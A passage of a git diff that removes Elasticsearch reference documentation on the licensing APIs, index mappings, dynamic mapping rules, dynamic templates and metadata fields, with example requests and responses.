- -[discrete] -==== Examples - -The following example checks whether you are eligible to start a trial: - -[source,console] ------------------------------------------------------------- -GET /_license/trial_status ------------------------------------------------------------- - -Example response: - -[source,console-result] ------------------------------------------------------------- -{ - "eligible_to_start_trial": true -} ------------------------------------------------------------- -// TESTRESPONSE[s/"eligible_to_start_trial": true/"eligible_to_start_trial": $body.eligible_to_start_trial/] diff --git a/docs/reference/licensing/index.asciidoc b/docs/reference/licensing/index.asciidoc deleted file mode 100644 index a1dfd398acf..00000000000 --- a/docs/reference/licensing/index.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[role="xpack"] -[[licensing-apis]] -== Licensing APIs - -You can use the following APIs to manage your licenses: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -include::delete-license.asciidoc[] -include::get-license.asciidoc[] -include::get-trial-status.asciidoc[] -include::start-trial.asciidoc[] -include::get-basic-status.asciidoc[] -include::start-basic.asciidoc[] -include::update-license.asciidoc[] diff --git a/docs/reference/licensing/start-basic.asciidoc b/docs/reference/licensing/start-basic.asciidoc deleted file mode 100644 index 199e917a292..00000000000 --- a/docs/reference/licensing/start-basic.asciidoc +++ /dev/null @@ -1,76 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[start-basic]] -=== Start basic API -++++ -Start basic -++++ - -This API starts an indefinite basic license. - -[discrete] -==== Request - -`POST /_license/start_basic` - -[discrete] -==== Description - -The `start basic` API enables you to initiate an indefinite basic license, which -gives access to all the basic features. If the basic license does not support -all of the features that are available with your current license, however, you are -notified in the response. You must then re-submit the API request with the -`acknowledge` parameter set to `true`. - -To check the status of your basic license, use the following API: -<>. - -For more information about the different types of licenses, see -https://www.elastic.co/subscriptions. - -==== Authorization - -You must have `manage` cluster privileges to use this API. -For more information, see -<>. - -[discrete] -==== Examples - -The following example starts a basic license if you do not currently have a license: - -[source,console] ------------------------------------------------------------- -POST /_license/start_basic ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Example response: -[source,js] ------------------------------------------------------------- -{ - "basic_was_started": true, - "acknowledged": true -} ------------------------------------------------------------- -// NOTCONSOLE - -The following example starts a basic license if you currently have a license with more -features than a basic license. 
As you are losing features, you must pass the acknowledge -parameter: - -[source,console] ------------------------------------------------------------- -POST /_license/start_basic?acknowledge=true ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Example response: -[source,js] ------------------------------------------------------------- -{ - "basic_was_started": true, - "acknowledged": true -} ------------------------------------------------------------- -// NOTCONSOLE \ No newline at end of file diff --git a/docs/reference/licensing/start-trial.asciidoc b/docs/reference/licensing/start-trial.asciidoc deleted file mode 100644 index ef3bd93410b..00000000000 --- a/docs/reference/licensing/start-trial.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[start-trial]] -=== Start trial API -++++ -Start trial -++++ - -Starts a 30-day trial. - -[discrete] -==== Request - -`POST /_license/start_trial` - -[discrete] -==== Description - -The `start trial` API enables you to start a 30-day trial, which gives access to -all subscription features. - -NOTE: You are allowed to initiate a trial only if your cluster has not already -activated a trial for the current major product version. For example, if you -have already activated a trial for v6.0, you cannot start a new trial until v7.0. -You can, however, request an extended trial at {extendtrial}. - -To check the status of your trial, use <>. - -For more information about features and subscriptions, see -https://www.elastic.co/subscriptions. - -==== Authorization - -You must have `manage` cluster privileges to use this API. -For more information, see -<>. - -[discrete] -==== Examples - -The following example starts a 30-day trial. The acknowledge parameter is -required as you are initiating a license that will expire. - -[source,console] ------------------------------------------------------------- -POST /_license/start_trial?acknowledge=true ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Example response: -[source,js] ------------------------------------------------------------- -{ - "trial_was_started": true, - "acknowledged": true -} ------------------------------------------------------------- -// NOTCONSOLE \ No newline at end of file diff --git a/docs/reference/licensing/update-license.asciidoc b/docs/reference/licensing/update-license.asciidoc deleted file mode 100644 index 823f564331d..00000000000 --- a/docs/reference/licensing/update-license.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[update-license]] -=== Update license API -++++ -Update license -++++ - -Updates the license for your {es} cluster. - -[[update-license-api-request]] -==== {api-request-title} - -`PUT _license` - -`POST _license` - -[[update-license-api-prereqs]] -==== {api-prereq-title} - -If {es} {security-features} are enabled, you need `manage` cluster privileges to -install the license. - -If {es} {security-features} are enabled and you are installing a gold or higher -license, you must enable TLS on the transport networking layer before you -install the license. See <>. - -[[update-license-api-desc]] -==== {api-description-title} - -You can update your license at runtime without shutting down your nodes. License -updates take effect immediately. If the license you are installing does not -support all of the features that were available with your previous license, -however, you are notified in the response. 
You must then re-submit the API -request with the `acknowledge` parameter set to `true`. - -For more information about the different types of licenses, see -https://www.elastic.co/subscriptions. - -[[update-license-api-query-params]] -==== {api-query-parms-title} - -`acknowledge`:: - (Optional, Boolean) - Specifies whether you acknowledge the license changes. The default - value is `false`. - -[[update-license-api-request-body]] -==== {api-request-body-title} - -`licenses`:: - (Required, array) - A sequence of one or more JSON documents containing the license information. - -[[update-license-api-example]] -==== {api-examples-title} - -The following example updates to a basic license: - -[source,console] ------------------------------------------------------------- -PUT _license -{ - "licenses": [ - { - "uid":"893361dc-9749-4997-93cb-802e3d7fa4xx", - "type":"basic", - "issue_date_in_millis":1411948800000, - "expiry_date_in_millis":1914278399999, - "max_nodes":1, - "issued_to":"issuedTo", - "issuer":"issuer", - "signature":"xx" - } - ] -} ------------------------------------------------------------- -// TEST[skip:license testing issues] - -NOTE: These values are invalid; you must substitute the appropriate content -from your license file. - -You can also install your license file using a `curl` command. Be sure to add -`@` before the license file path to instruct curl to treat it as an input file. - -[source,shell] ------------------------------------------------------------- -curl -XPUT -u 'http://:/_license' -H "Content-Type: application/json" -d @license.json ------------------------------------------------------------- -// NOTCONSOLE - -On Windows, use the following command: - -[source,shell] ------------------------------------------------------------- -Invoke-WebRequest -uri http://:/_license -Credential elastic -Method Put -ContentType "application/json" -InFile .\license.json ------------------------------------------------------------- - -In these examples, - -* `` is a user ID with the appropriate authority. -* `` is the hostname of any node in the {es} cluster (`localhost` if - executing locally) -* `` is the http port (defaults to `9200`) -* `license.json` is the license JSON file - -NOTE: If your {es} node has SSL enabled on the HTTP interface, you must - start your URL with `https://` - -If you previously had a license with more features than the basic license, you -receive the following response: - -[source,js] ------------------------------------------------------------- - { - "acknowledged": false, - "license_status": "valid", - "acknowledge": { - "message": """This license update requires acknowledgement. To acknowledge the license, please read the following messages and update the license again, this time with the "acknowledge=true" parameter:""", - "watcher": [ - "Watcher will be disabled" - ], - "logstash": [ - "Logstash will no longer poll for centrally-managed pipelines" - ], - "security": [ - "The following X-Pack security functionality will be disabled: ..." ] - } -} ------------------------------------------------------------- -// NOTCONSOLE - -To complete the update, you must re-submit the API request and set the -`acknowledge` parameter to `true`. 
For example: - -[source,console] ------------------------------------------------------------- -PUT _license?acknowledge=true -{ - "licenses": [ - { - "uid":"893361dc-9749-4997-93cb-802e3d7fa4xx", - "type":"basic", - "issue_date_in_millis":1411948800000, - "expiry_date_in_millis":1914278399999, - "max_nodes":1, - "issued_to":"issuedTo", - "issuer":"issuer", - "signature":"xx" - } - ] -} ------------------------------------------------------------- -// TEST[skip:license testing issues] - -Alternatively: - -[source,sh] ------------------------------------------------------------- -curl -XPUT -u elastic 'http://:/_license?acknowledge=true' -H "Content-Type: application/json" -d @license.json ------------------------------------------------------------- -// NOTCONSOLE - -For more information about the features that are disabled when your license -expires, see -{kibana-ref}/managing-licenses.html#license-expiration[License expiration]. diff --git a/docs/reference/links.asciidoc b/docs/reference/links.asciidoc deleted file mode 100644 index 11b6629d867..00000000000 --- a/docs/reference/links.asciidoc +++ /dev/null @@ -1,4 +0,0 @@ -// These attributes define common links in the Elasticsearch Reference - -:ml-docs-setup: {ml-docs}/setup.html[Set up {ml-features}] -:ml-docs-setup-privileges: {ml-docs}/setup.html#setup-privileges[{ml-cap} security privileges] diff --git a/docs/reference/mapping.asciidoc b/docs/reference/mapping.asciidoc deleted file mode 100644 index e146b1194f6..00000000000 --- a/docs/reference/mapping.asciidoc +++ /dev/null @@ -1,264 +0,0 @@ -[[mapping]] -= Mapping - -[partintro] --- - -Mapping is the process of defining how a document, and the fields it contains, -are stored and indexed. For instance, use mappings to define: - -* which string fields should be treated as full text fields. -* which fields contain numbers, dates, or geolocations. -* the <> of date values. -* custom rules to control the mapping for - <>. - -A mapping definition has: - -<>:: - -Metadata fields are used to customize how a document's associated metadata is -treated. Examples of metadata fields include the document's -<>, <>, and -<> fields. - -<>:: - -A mapping contains a list of fields or `properties` pertinent to the -document. Each field has its own <>. - -NOTE: Before 7.0.0, the 'mappings' definition used to include a type name. -For more details, please see <>. - -[[mapping-limit-settings]] -[discrete] -=== Settings to prevent mappings explosion - -Defining too many fields in an index can lead to a -mapping explosion, which can cause out of memory errors and difficult -situations to recover from. - -Consider a situation where every new document inserted -introduces new fields, such as with <>. -Each new field is added to the index mapping, which can become a -problem as the mapping grows. - -Use the following settings to limit the number of field mappings (created manually or dynamically) and prevent documents from causing a mapping explosion: - -`index.mapping.total_fields.limit`:: - The maximum number of fields in an index. Field and object mappings, as well as - field aliases count towards this limit. The default value is `1000`. -+ -[IMPORTANT] -==== -The limit is in place to prevent mappings and searches from becoming too -large. Higher values can lead to performance degradations and memory issues, -especially in clusters with a high load or few resources. - -If you increase this setting, we recommend you also increase the -<> setting, which -limits the maximum number of <> in a query. 
-==== -+ -[TIP] -==== -If your field mappings contain a large, arbitrary set of keys, consider using the <> data type. -==== - -`index.mapping.depth.limit`:: - The maximum depth for a field, which is measured as the number of inner - objects. For instance, if all fields are defined at the root object level, - then the depth is `1`. If there is one object mapping, then the depth is - `2`, etc. Default is `20`. - -// tag::nested-fields-limit[] -`index.mapping.nested_fields.limit`:: - The maximum number of distinct `nested` mappings in an index. The `nested` type should only be used in special cases, when arrays of objects need to be queried independently of each other. To safeguard against poorly designed mappings, this setting - limits the number of unique `nested` types per index. Default is `50`. -// end::nested-fields-limit[] - -// tag::nested-objects-limit[] -`index.mapping.nested_objects.limit`:: - The maximum number of nested JSON objects that a single document can contain across all - `nested` types. This limit helps to prevent out of memory errors when a document contains too many nested - objects. Default is `10000`. -// end::nested-objects-limit[] - -`index.mapping.field_name_length.limit`:: - Setting for the maximum length of a field name. This setting isn't really something that addresses - mappings explosion but might still be useful if you want to limit the field length. - It usually shouldn't be necessary to set this setting. The default is okay - unless a user starts to add a huge number of fields with really long names. Default is - `Long.MAX_VALUE` (no limit). - -[discrete] -== Dynamic mapping - -Fields and mapping types do not need to be defined before being used. Thanks -to _dynamic mapping_, new field names will be added automatically, just by -indexing a document. New fields can be added both to the top-level mapping -type, and to inner <> and <> fields. - -The <> rules can be configured to customise -the mapping that is used for new fields. - -[discrete] -== Explicit mappings - -You know more about your data than Elasticsearch can guess, so while dynamic -mapping can be useful to get started, at some point you will want to specify -your own explicit mappings. - -You can create field mappings when you <> and -<>. - -[discrete] -[[create-mapping]] -== Create an index with an explicit mapping - -You can use the <> API to create a new index -with an explicit mapping. - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "age": { "type": "integer" }, <1> - "email": { "type": "keyword" }, <2> - "name": { "type": "text" } <3> - } - } -} ----- - -<1> Creates `age`, an <> field -<2> Creates `email`, a <> field -<3> Creates `name`, a <> field - -[discrete] -[[add-field-mapping]] -== Add a field to an existing mapping - -You can use the <> API to add one or more new -fields to an existing index. - -The following example adds `employee-id`, a `keyword` field with an -<> mapping parameter value of `false`. This means values -for the `employee-id` field are stored but not indexed or available for search. 
- -[source,console] ----- -PUT /my-index-000001/_mapping -{ - "properties": { - "employee-id": { - "type": "keyword", - "index": false - } - } -} ----- -// TEST[continued] - -[discrete] -[[update-mapping]] -=== Update the mapping of a field - -include::{es-repo-dir}/indices/put-mapping.asciidoc[tag=change-field-mapping] - -include::{es-repo-dir}/indices/put-mapping.asciidoc[tag=rename-field] - -[discrete] -[[view-mapping]] -== View the mapping of an index - -You can use the <> API to view the mapping of -an existing index. - -[source,console] ----- -GET /my-index-000001/_mapping ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-index-000001" : { - "mappings" : { - "properties" : { - "age" : { - "type" : "integer" - }, - "email" : { - "type" : "keyword" - }, - "employee-id" : { - "type" : "keyword", - "index" : false - }, - "name" : { - "type" : "text" - } - } - } - } -} ----- - - -[discrete] -[[view-field-mapping]] -== View the mapping of specific fields - -If you only want to view the mapping of one or more specific fields, you can use -the <> API. - -This is useful if you don't need the complete mapping of an index or your index -contains a large number of fields. - -The following request retrieves the mapping for the `employee-id` field. - -[source,console] ----- -GET /my-index-000001/_mapping/field/employee-id ----- -// TEST[continued] - -The API returns the following response: - -[source,console-result] ----- -{ - "my-index-000001" : { - "mappings" : { - "employee-id" : { - "full_name" : "employee-id", - "mapping" : { - "employee-id" : { - "type" : "keyword", - "index" : false - } - } - } - } - } -} - ----- - --- - -include::mapping/removal_of_types.asciidoc[] - -include::mapping/types.asciidoc[] - -include::mapping/fields.asciidoc[] - -include::mapping/params.asciidoc[] - -include::mapping/dynamic-mapping.asciidoc[] diff --git a/docs/reference/mapping/dynamic-mapping.asciidoc b/docs/reference/mapping/dynamic-mapping.asciidoc deleted file mode 100644 index 54d373e1e29..00000000000 --- a/docs/reference/mapping/dynamic-mapping.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ -[[dynamic-mapping]] -== Dynamic Mapping - -One of the most important features of Elasticsearch is that it tries to get -out of your way and let you start exploring your data as quickly as possible. -To index a document, you don't have to first create an index, define a mapping -type, and define your fields -- you can just index a document and the index, -type, and fields will spring to life automatically: - -[source,console] --------------------------------------------------- -PUT data/_doc/1 <1> -{ "count": 5 } --------------------------------------------------- - -<1> Creates the `data` index, the `_doc` mapping type, and a field - called `count` with data type `long`. - -The automatic detection and addition of new fields is called -_dynamic mapping_. The dynamic mapping rules can be customised to suit your -purposes with: - -<>:: - - The rules governing dynamic field detection. - -<>:: - - Custom rules to configure the mapping for dynamically added fields. - -TIP: <> allow you to configure the default -mappings, settings and aliases for new indices, whether created -automatically or explicitly. 
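As an illustrative sketch of that tip (the template name `my-template` and the `my-index-*` pattern are placeholders, composable index templates are assumed to be available, and this is not one of the file's tested snippets), an index template can pre-define default settings and mappings for any matching index, whether the index is created explicitly or springs to life through dynamic mapping:

[source,console]
--------------------------------------------------
PUT _index_template/my-template
{
  "index_patterns": [ "my-index-*" ],        <1>
  "template": {
    "settings": {
      "number_of_shards": 1                  <2>
    },
    "mappings": {
      "properties": {
        "created_at": { "type": "date" }     <3>
      }
    }
  }
}
--------------------------------------------------

<1> Indices whose names match this pattern receive the template when they are created.
<2> Default index settings.
<3> Default field mappings; dynamic mapping still applies to any other fields in incoming documents.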
- -include::dynamic/field-mapping.asciidoc[] - -include::dynamic/templates.asciidoc[] - diff --git a/docs/reference/mapping/dynamic/field-mapping.asciidoc b/docs/reference/mapping/dynamic/field-mapping.asciidoc deleted file mode 100644 index c1652baf2d2..00000000000 --- a/docs/reference/mapping/dynamic/field-mapping.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ -[[dynamic-field-mapping]] -=== Dynamic field mapping - -By default, when a previously unseen field is found in a document, -Elasticsearch will add the new field to the type mapping. This behaviour can -be disabled, both at the document and at the <> level, by -setting the <> parameter to `false` (to ignore new fields) or to `strict` (to throw -an exception if an unknown field is encountered). - -Assuming `dynamic` field mapping is enabled, some simple rules are used to -determine which data type the field should have: - -[horizontal] -*JSON data type*:: *Elasticsearch data type* - -`null`:: No field is added. -`true` or `false`:: <> field -floating{nbsp}point{nbsp}number:: <> field -integer:: <> field -object:: <> field -array:: Depends on the first non-`null` value in the array. -string:: Either a <> field - (if the value passes <>), - a <> or <> field - (if the value passes <>) - or a <> field, with a <> sub-field. - -These are the only <> that are dynamically -detected. All other data types must be mapped explicitly. - -Besides the options listed below, dynamic field mapping rules can be further -customised with <>. - -[[date-detection]] -==== Date detection - -If `date_detection` is enabled (default), then new string fields are checked -to see whether their contents match any of the date patterns specified in -`dynamic_date_formats`. If a match is found, a new <> field is -added with the corresponding format. - -The default value for `dynamic_date_formats` is: - -[ <>,`"yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z"`] - -For example: - - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "create_date": "2015/09/02" -} - -GET my-index-000001/_mapping <1> --------------------------------------------------- - -<1> The `create_date` field has been added as a <> - field with the <>: + - `"yyyy/MM/dd HH:mm:ss Z||yyyy/MM/dd Z"`. - -===== Disabling date detection - -Dynamic date detection can be disabled by setting `date_detection` to `false`: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "date_detection": false - } -} - -PUT my-index-000001/_doc/1 <1> -{ - "create": "2015/09/02" -} --------------------------------------------------- - -<1> The `create_date` field has been added as a <> field. - -===== Customising detected date formats - -Alternatively, the `dynamic_date_formats` can be customised to support your -own <>: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_date_formats": ["MM/dd/yyyy"] - } -} - -PUT my-index-000001/_doc/1 -{ - "create_date": "09/25/2015" -} --------------------------------------------------- - - -[[numeric-detection]] -==== Numeric detection - -While JSON has support for native floating point and integer data types, some -applications or languages may sometimes render numbers as strings. 
Usually the -correct solution is to map these fields explicitly, but numeric detection -(which is disabled by default) can be enabled to do this automatically: - - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "numeric_detection": true - } -} - -PUT my-index-000001/_doc/1 -{ - "my_float": "1.0", <1> - "my_integer": "1" <2> -} --------------------------------------------------- - -<1> The `my_float` field is added as a <> field. -<2> The `my_integer` field is added as a <> field. - diff --git a/docs/reference/mapping/dynamic/templates.asciidoc b/docs/reference/mapping/dynamic/templates.asciidoc deleted file mode 100644 index 83b7dd65376..00000000000 --- a/docs/reference/mapping/dynamic/templates.asciidoc +++ /dev/null @@ -1,426 +0,0 @@ -[[dynamic-templates]] -=== Dynamic templates - -Dynamic templates allow you to define custom mappings that can be applied to -dynamically added fields based on: - -* the <> detected by Elasticsearch, with <>. -* the name of the field, with <> or <>. -* the full dotted path to the field, with <>. - -The original field name `{name}` and the detected data type -`{dynamic_type}` <> can be used in -the mapping specification as placeholders. - -IMPORTANT: Dynamic field mappings are only added when a field contains a -concrete value -- not `null` or an empty array. This means that if the -`null_value` option is used in a `dynamic_template`, it will only be applied -after the first document with a concrete value for the field has been -indexed. - -Dynamic templates are specified as an array of named objects: - -[source,js] --------------------------------------------------- - "dynamic_templates": [ - { - "my_template_name": { <1> - ... match conditions ... <2> - "mapping": { ... } <3> - } - }, - ... - ] --------------------------------------------------- -// NOTCONSOLE -<1> The template name can be any string value. -<2> The match conditions can include any of : `match_mapping_type`, `match`, `match_pattern`, `unmatch`, `path_match`, `path_unmatch`. -<3> The mapping that the matched field should use. - -If a provided mapping contains an invalid mapping snippet, a validation error -is returned. Validation occurs when applying the dynamic template at index time, -and, in most cases, when the dynamic template is updated. Providing an invalid mapping -snippet may cause the update or validation of a dynamic template to fail under certain conditions: - -* If no `match_mapping_type` has been specified but the template is valid for at least one predefined mapping type, - the mapping snippet is considered valid. However, a validation error is returned at index time if a field matching - the template is indexed as a different type. For example, configuring a dynamic template with no `match_mapping_type` - is considered valid as string type, but if a field matching the dynamic template is indexed as a long, a validation - error is returned at index time. - -* If the `{name}` placeholder is used in the mapping snippet, validation is skipped when updating the dynamic - template. This is because the field name is unknown at that time. Instead, validation occurs when the template is applied - at index time. - -Templates are processed in order -- the first matching template wins. When -putting new dynamic templates through the <> API, -all existing templates are overwritten. This allows for dynamic templates to be -reordered or deleted after they were initially added. 
- -[[match-mapping-type]] -==== `match_mapping_type` - -The `match_mapping_type` is the data type detected by the JSON parser. Since -JSON doesn't distinguish a `long` from an `integer` or a `double` from -a `float`, it will always choose the wider data type, i.e. `long` for integers -and `double` for floating-point numbers. - -The following data types may be automatically detected: - - - `boolean` when `true` or `false` are encountered. - - `date` when <> is enabled and a string matching - any of the configured date formats is found. - - `double` for numbers with a decimal part. - - `long` for numbers without a decimal part. - - `object` for objects, also called hashes. - - `string` for character strings. - -`*` may also be used in order to match all data types. - -For example, if we wanted to map all integer fields as `integer` instead of -`long`, and all `string` fields as both `text` and `keyword`, we -could use the following template: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "integers": { - "match_mapping_type": "long", - "mapping": { - "type": "integer" - } - } - }, - { - "strings": { - "match_mapping_type": "string", - "mapping": { - "type": "text", - "fields": { - "raw": { - "type": "keyword", - "ignore_above": 256 - } - } - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "my_integer": 5, <1> - "my_string": "Some string" <2> -} --------------------------------------------------- - -<1> The `my_integer` field is mapped as an `integer`. -<2> The `my_string` field is mapped as a `text`, with a `keyword` <>. - - -[[match-unmatch]] -==== `match` and `unmatch` - -The `match` parameter uses a pattern to match on the field name, while -`unmatch` uses a pattern to exclude fields matched by `match`. - -The following example matches all `string` fields whose name starts with -`long_` (except for those which end with `_text`) and maps them as `long` -fields: - - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "longs_as_strings": { - "match_mapping_type": "string", - "match": "long_*", - "unmatch": "*_text", - "mapping": { - "type": "long" - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "long_num": "5", <1> - "long_text": "foo" <2> -} --------------------------------------------------- - -<1> The `long_num` field is mapped as a `long`. -<2> The `long_text` field uses the default `string` mapping. - -[[match-pattern]] -==== `match_pattern` - -The `match_pattern` parameter adjusts the behavior of the `match` parameter -such that it supports full Java regular expression matching on the field name -instead of simple wildcards, for instance: - -[source,js] --------------------------------------------------- - "match_pattern": "regex", - "match": "^profit_\d+$" --------------------------------------------------- -// NOTCONSOLE - -[[path-match-unmatch]] -==== `path_match` and `path_unmatch` - -The `path_match` and `path_unmatch` parameters work in the same way as `match` -and `unmatch`, but operate on the full dotted path to the field, not just the -final name, e.g. `some_object.*.some_field`. 
- -This example copies the values of any fields in the `name` object to the -top-level `full_name` field, except for the `middle` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "full_name": { - "path_match": "name.*", - "path_unmatch": "*.middle", - "mapping": { - "type": "text", - "copy_to": "full_name" - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "name": { - "first": "John", - "middle": "Winston", - "last": "Lennon" - } -} --------------------------------------------------- - -Note that the `path_match` and `path_unmatch` parameters match on object paths -in addition to leaf fields. As an example, indexing the following document will -result in an error because the `path_match` setting also matches the object -field `name.title`, which can't be mapped as text: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/2 -{ - "name": { - "first": "Paul", - "last": "McCartney", - "title": { - "value": "Sir", - "category": "order of chivalry" - } - } -} --------------------------------------------------- -// TEST[continued] -// TEST[catch:bad_request] - -[[template-variables]] -==== `{name}` and `{dynamic_type}` - -The `{name}` and `{dynamic_type}` placeholders are replaced in the `mapping` -with the field name and detected dynamic type. The following example sets all -string fields to use an <> with the same name as the -field, and disables <> for all non-string fields: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "named_analyzers": { - "match_mapping_type": "string", - "match": "*", - "mapping": { - "type": "text", - "analyzer": "{name}" - } - } - }, - { - "no_doc_values": { - "match_mapping_type":"*", - "mapping": { - "type": "{dynamic_type}", - "doc_values": false - } - } - } - ] - } -} - -PUT my-index-000001/_doc/1 -{ - "english": "Some English text", <1> - "count": 5 <2> -} --------------------------------------------------- -// TEST[warning:Parameter [doc_values] has no effect on type [text] and will be removed in future] - -<1> The `english` field is mapped as a `string` field with the `english` analyzer. -<2> The `count` field is mapped as a `long` field with `doc_values` disabled. - -[[template-examples]] -==== Template examples - -Here are some examples of potentially useful dynamic templates: - -===== Structured search - -By default Elasticsearch will map string fields as a `text` field with a sub -`keyword` field. However if you are only indexing structured content and not -interested in full text search, you can make Elasticsearch map your fields -only as `keyword`s. Note that this means that in order to search those fields, -you will have to search on the exact same value that was indexed. 
- -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "strings_as_keywords": { - "match_mapping_type": "string", - "mapping": { - "type": "keyword" - } - } - } - ] - } -} --------------------------------------------------- - -[[text-only-mappings-strings]] -===== `text`-only mappings for strings - -On the contrary to the previous example, if the only thing that you care about -on your string fields is full-text search, and if you don't plan on running -aggregations, sorting or exact search on your string fields, you could tell -Elasticsearch to map it only as a text field (which was the default behaviour -before 5.0): - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "strings_as_text": { - "match_mapping_type": "string", - "mapping": { - "type": "text" - } - } - } - ] - } -} --------------------------------------------------- - -===== Disabled norms - -Norms are index-time scoring factors. If you do not care about scoring, which -would be the case for instance if you never sort documents by score, you could -disable the storage of these scoring factors in the index and save some space. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "strings_as_keywords": { - "match_mapping_type": "string", - "mapping": { - "type": "text", - "norms": false, - "fields": { - "keyword": { - "type": "keyword", - "ignore_above": 256 - } - } - } - } - } - ] - } -} --------------------------------------------------- - -The sub `keyword` field appears in this template to be consistent with the -default rules of dynamic mappings. Of course if you do not need them because -you don't need to perform exact search or aggregate on this field, you could -remove it as described in the previous section. - -===== Time series - -When doing time series analysis with Elasticsearch, it is common to have many -numeric fields that you will often aggregate on but never filter on. In such a -case, you could disable indexing on those fields to save disk space and also -maybe gain some indexing speed: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic_templates": [ - { - "unindexed_longs": { - "match_mapping_type": "long", - "mapping": { - "type": "long", - "index": false - } - } - }, - { - "unindexed_doubles": { - "match_mapping_type": "double", - "mapping": { - "type": "float", <1> - "index": false - } - } - } - ] - } -} --------------------------------------------------- - -<1> Like the default dynamic mapping rules, doubles are mapped as floats, which - are usually accurate enough, yet require half the disk space. diff --git a/docs/reference/mapping/fields.asciidoc b/docs/reference/mapping/fields.asciidoc deleted file mode 100644 index df9dbb376b5..00000000000 --- a/docs/reference/mapping/fields.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[mapping-fields]] -== Metadata fields - -Each document has metadata associated with it, such as the `_index`, mapping -<>, and `_id` metadata fields. The behavior of -some of these metadata fields can be customized when a mapping type is created. - -[discrete] -=== Identity metadata fields - -[horizontal] -<>:: - - The index to which the document belongs. - -<>:: - - The document's mapping type. - -<>:: - - The document's ID. 
- -[discrete] -=== Document source metadata fields - -<>:: - - The original JSON representing the body of the document. - -{plugins}/mapper-size.html[`_size`]:: - - The size of the `_source` field in bytes, provided by the - {plugins}/mapper-size.html[`mapper-size` plugin]. - -[discrete] -=== Indexing metadata fields - -<>:: - - All fields in the document which contain non-null values. - -<>:: - - All fields in the document that have been ignored at index time because of - <>. - -[discrete] -=== Routing metadata field - -<>:: - - A custom routing value which routes a document to a particular shard. - -[discrete] -=== Other metadata field - -<>:: - - Application specific metadata. - - -include::fields/field-names-field.asciidoc[] - -include::fields/ignored-field.asciidoc[] - -include::fields/id-field.asciidoc[] - -include::fields/index-field.asciidoc[] - -include::fields/meta-field.asciidoc[] - -include::fields/routing-field.asciidoc[] - -include::fields/source-field.asciidoc[] - -include::fields/type-field.asciidoc[] - diff --git a/docs/reference/mapping/fields/field-names-field.asciidoc b/docs/reference/mapping/fields/field-names-field.asciidoc deleted file mode 100644 index 282750dc54f..00000000000 --- a/docs/reference/mapping/fields/field-names-field.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[mapping-field-names-field]] -=== `_field_names` field - -The `_field_names` field used to index the names of every field in a document that -contains any value other than `null`. This field was used by the -<> query to find documents that -either have or don't have any non-+null+ value for a particular field. - -Now the `_field_names` field only indexes the names of fields that have -`doc_values` and `norms` disabled. For fields which have either `doc_values` -or `norm` enabled the <> query will still -be available but will not use the `_field_names` field. - -[[disable-field-names]] -==== Disabling `_field_names` - -NOTE: Disabling `_field_names` has been deprecated and will be removed in a future major version. - -Disabling `_field_names` is usually not necessary because it no longer -carries the index overhead it once did. If you have a lot of fields -which have `doc_values` and `norms` disabled and you do not need to -execute `exists` queries using those fields you might want to disable -`_field_names` by adding the following to the mappings: - -[source,console] --------------------------------------------------- -PUT tweets -{ - "mappings": { - "_field_names": { - "enabled": false - } - } -} --------------------------------------------------- -// TEST[warning:Disabling _field_names is not necessary because it no longer carries a large index overhead. Support for the `enabled` setting will be removed in a future major version. Please remove it from your mappings and templates.] diff --git a/docs/reference/mapping/fields/id-field.asciidoc b/docs/reference/mapping/fields/id-field.asciidoc deleted file mode 100644 index 1e963dd6de7..00000000000 --- a/docs/reference/mapping/fields/id-field.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[mapping-id-field]] -=== `_id` field - -Each document has an `_id` that uniquely identifies it, which is indexed -so that documents can be looked up either with the <> or the -<>. The `_id` can either be assigned at -indexing time, or a unique `_id` can be generated by {es}. This field is not -configurable in the mappings. - -The value of the `_id` field is accessible in queries such as `term`, -`terms`, `match`, and `query_string`. 
